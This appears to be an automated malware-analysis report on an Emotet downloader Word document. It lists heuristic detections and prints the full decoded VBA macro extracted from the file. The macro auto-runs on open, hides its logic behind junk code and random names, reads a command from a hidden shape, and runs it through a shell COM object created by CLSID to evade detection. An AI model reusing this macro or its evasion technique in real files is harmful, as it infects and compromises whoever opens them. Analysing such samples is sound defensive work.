Verdict: MALICIOUS
Risk Score: 252
Heuristics: 9
- ClamAV: Doc.Downloader.Emotet-6765662-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6765662-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: `End Select Set wpTmORCZ = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HaaBiLa) On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: `End Select Set wpTmORCZ = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HaaBiLa) On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6862 bytes |

SHA-256: dc64fa5df8318bd2b5fc0cfea43a0b3b51020beabce8f2efce63dce077882ddb

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 120 of 181 identifiers look randomly generated (e.g. 'SaPkzzGTmbo'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "GaLTbMhr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case oErsqBA
Case 21851158
EpWnUAj = 40229889
uhzoi = CLng(335393460)
Case 125659895
tpMQpQL = Oct(KOQsFkPjc)
zwwrDKOzp = aAVsZRI
Case 71341793
GPYKuJmPN = CDate(KROMo)
UaCmBBpbh = Int(122229003 * sYTnc)
End Select
On Error Resume Next
Select Case ZNEjJ
Case 279467587
HQqSKL = 305921407
zZmAB = CLng(222921588)
Case 132651624
KApoSYwH = Oct(HrOlWTz)
DoLqEBJZ = uabJAaF
Case 194399572
jTCBiRjwC = CDate(jXbGnR)
sJtGwfOqi = Int(160623235 * MHRIHcmf)
End Select
On Error Resume Next
Select Case VSvhcTI
Case 163779382
OPtYVTQA = 205860914
jLYiljjc = CLng(317724797)
Case 190860647
qjfpj = Oct(onmLL)
EnsLCw = klRZzQznK
Case 9721682
qMvhXfOil = CDate(cNsdY)
TrtUjjDsQ = Int(163470622 * iZlVi)
End Select
Set VfboDhQvB = Shapes("SaPkzzGTmbo")
On Error Resume Next
Select Case PNvrCnlQ
Case 100463081
wDnWqcU = 18231981
XaJGij = CLng(195774619)
Case 276573924
LXlrShIwr = Oct(hzcfMQ)
owoNE = wcSGF
Case 46661229
LZzsFs = CDate(EkGOukzUN)
vzqarfBfH = Int(149009755 * PAaCpdJI)
End Select
On Error Resume Next
Select Case XEHnzzpz
Case 165055754
YVlDjEk = 11773503
VdiLf = CLng(106223360)
Case 81415117
TZDsVunz = Oct(tBzUQ)
lJqakcT = UcDGDo
Case 300527413
XlSWXVc = CDate(bwFiL)
EnEFwBpp = Int(186335264 * zNiQS)
End Select
kABIaX = "" + dPWLI + UXCEsaT + TtvMzVGp + VfboDhQvB.TextFrame.TextRange.Text + TXnmaMo + LFGqMLL + zdPtY
On Error Resume Next
Select Case LSWEsdah
Case 177904796
JLAduRqci = 107914690
IiFmrWKi = CLng(119791015)
Case 20280931
GaMziil = Oct(jAILAiiqX)
nDFFzDjR = BGQwIr
Case 196615577
aQziI = CDate(ikmzXEDJj)
wfzZBaJN = Int(112189254 * jtQCzT)
End Select
On Error Resume Next
Select Case uiDMBHLLs
Case 78763007
GuAdwY = 147129098
dSZjjOoiw = CLng(47872630)
Case 238705071
qzaiB = Oct(iwsjHZZ)
jHkdfMBEF = VwWzNYME
Case 51362206
UIUWb = CDate(qXzzKzG)
ihzVbXHm = Int(293013866 * IDGlkTUDR)
End Select
On Error Resume Next
Select Case vSZNabIIk
Case 151594535
wSXNzw = 219396845
JUwWwBvEO = CLng(217680833)
Case 62993835
inHto = Oct(EGospURY)
knEbORiC = wvbMfXu
Case 178389058
VlLKdZI = CDate(bIQfiFZWL)
JFukEl = Int(246755736 * tNsbRzNsw)
End Select
Set wpTmORCZ = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HaaBiLa)
On Error Resume Next
Select Case NAoJwWhCV
Case 273529677
BsiFmSbj = 42615924
uzwJUNE = CLng(144382698)
Case 329569044
hXoIMwl = Oct(Ccfzf)
YHcuzzhQj = SArAcIc
Case 215427981
LziDato = CDate(XddtwTDk)
kKWwwR = Int(284155670 * pLGkbu)
End Select
On Error Resume Next
Select Case hoBEJGT
Case 112056683
cUOEYj = 338685172
dYHoHzsd = CLng(31667711)
Case 332679787
RDRbjLwHU = Oct(AkpRsjLXZ)
LTznwF = ZoJaFIaz
Case 94633123
sisbZi = CDate(coSXPQjF)
ihzGdfid = Int(150190793 * LUvcOS)
End Select
On Error Resume Next
Select Case zWCVRVqF
Case 290103681
jiWvdw = 233631985
XhPHb = CLng(209817654)
Case 322237547
OOrJvsNjQ = Oct(JinQAI)
jKRlzpZ = NpMTr
Case 306661953
YYHcNiW = CDate(QmfSmASGj)
mvVfH = Int(108102002 * RCiCBQZ)
End Select
On Error Resume Next
Select Case rjnEpB
Case 196063685
IinqT = 113926415
dDFYo = CLng(5468169)
Case 219414423
qPShhi = Oct(QCumUON)
JfiCtaNA = VAsZMATSK
Case 144112870
oXTwZjOlw = CDate(wnQTwtFw)
mcPSLjlC = Int(22534269 * bUKsQ)
End Select
Const AbYYvdTH = 0
On Error Resume Next
Select Case CRYKzROO
Case 319688484
msQZQ = 292890528
nMiFd = CLng(252997013)
Case 17527722
CwMWha = Oct(QRFrGBQm)
DUQJHpdk = XNJZhYf
Case 143120012
zVBrOizbz = CDate(YmAXZo)
IWsMN = Int(125054312 * wKMirjj)
End Select
On Error Resume Next
Select Case zCivn
Case 132602995
EURmRwS = 141880354
GVfmcNUoP = CLng(290949277)
Case 245005670
zENzPIt = Oct(SkzUtRlkM)
EimOtQW = fkipfviwF
Case 104019008
mCpZV = CDate(WVKsLbjb)
oGmlLwdXd = Int(57648761 * cEElwM)
End Select
wpTmORCZ.Run! kABIaX, AbYYvdTH
On Error Resume Next
Select Case iusjNOn
Case 9084961
jhYFvvki = 226248467
bTFqwj = CLng(192274611)
Case 195624993
RAUacNq = Oct(YEYMbqU)
DpVlcXj = FwHdEvzkk
Case 89960387
mPHwrFSM = CDate(KFAdkRt)
HszuUVVfG = Int(85296037 * cHnbNGi)
End Select
On Error Resume Next
Select Case LNATp
Case 290296464
VUqkFUf = 296916343
cjqhJbop = CLng(196622604)
Case 31170393
XIFQQ = Oct(bPqkbMjn)
oTolujWsr = UtzkYLq
Case 242179682
CNPaUSsQ = CDate(AATGt)
nUAsKa = Int(4673055 * Olwtbi)
End Select
On Error Resume Next
Select Case InVuGD
Case 104042503
HikON = 104248786
KsvYX = CLng(339496039)
Case 257392642
nbjnOTww = Oct(tKnQAY)
MXItFTt = bzinlzlQ
Case 138539799
iTXPA = CDate(LmYVDclJ)
SMzrtd = Int(135087440 * wMPoIKMH)
End Select
End Sub